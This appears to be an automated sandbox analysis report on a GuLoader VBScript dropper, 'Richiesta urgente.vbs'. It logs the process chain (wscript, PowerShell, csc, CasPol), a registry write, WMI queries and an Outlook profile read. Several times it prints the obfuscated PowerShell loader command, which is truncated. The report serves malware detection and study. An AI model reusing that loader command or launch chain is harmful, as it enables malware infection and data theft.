Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP" Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1D95AAB6 AdjustTokenPrivileges, 10_2_1D95AAB6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1D95AA7F AdjustTokenPrivileges, 10_2_1D95AA7F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdv1nroa.nix.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@13/10@2/2
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4540:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1092:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Richiesta urgente.vbs"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll Jump to behavior
Source: Binary string: fk8C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.pdb source: powershell.exe, 00000003.00000002.738843445.0000000004AE7000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IHost.CreateObject("WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IWshExec.StdOut();ITextStream.ReadLine();IWshShell3.RegWrite("HKEY_CURRENT_USER\Antar\Handlings\Detekteringernes", "cQGbcQGbuqdXJKrrAmx26wLrX4HqxXyk4nEBm+sC5jeB8kIefsfrApk4cQGb6wLc7XEBm+tP", "REG_SZ");IFileSystem3.FileExists("C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe");IShellDispatch6.ShellExecute("C:\Windows\syswow64\WindowsPowerShell\v", " "$Skolegaardene = """ReABedSadDi-FiTGe", "", "", "0")
Yara detected GuLoader
Source: Yara match File source: 00000003.00000002.759722470.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.627203109.0000000001350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Obfuscated command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1DB3D832 pushfd ; ret 10_2_1DB3DE91
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209E394B push 8BFFFFFFh; retf 10_2_209E3950
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209E3622 push ebp; iretd 10_2_209E3628
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline Jump to behavior
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
